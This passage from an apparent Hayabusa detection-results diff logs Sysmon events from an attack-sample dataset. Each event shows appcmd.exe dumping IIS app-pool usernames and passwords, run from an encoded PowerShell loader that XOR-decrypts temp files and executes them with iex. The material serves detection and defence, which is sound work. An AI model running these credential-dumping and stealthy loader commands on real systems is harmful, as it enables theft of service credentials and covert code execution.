kAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 560 | PGUID: 365ABB72-3D6D-5CEB-0000-0010C47BFF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:17.971 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""Line Number: 0"" /text:processmodel.username | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 3196 | PGUID: 365ABB72-3D6D-5CEB-0000-00108C7FFF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:18.041 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""Line Number: 0"" /text:processmodel.password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 2472 | PGUID: 365ABB72-3D6E-5CEB-0000-00104C83FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:18.121 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.username | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 2896 | PGUID: 365ABB72-3D6E-5CEB-0000-00100C87FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:18.202 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 2524 | PGUID: 365ABB72-3D6E-5CEB-0000-0010CC8AFF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:18.282 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""Description: Cannot read configuration file due to insufficient permissions"" /text:processmodel.username | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 3144 | PGUID: 365ABB72-3D6E-5CEB-0000-00108C8EFF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:18.352 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""Description: Cannot read configuration file due to insufficient permissions"" /text:processmodel.password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 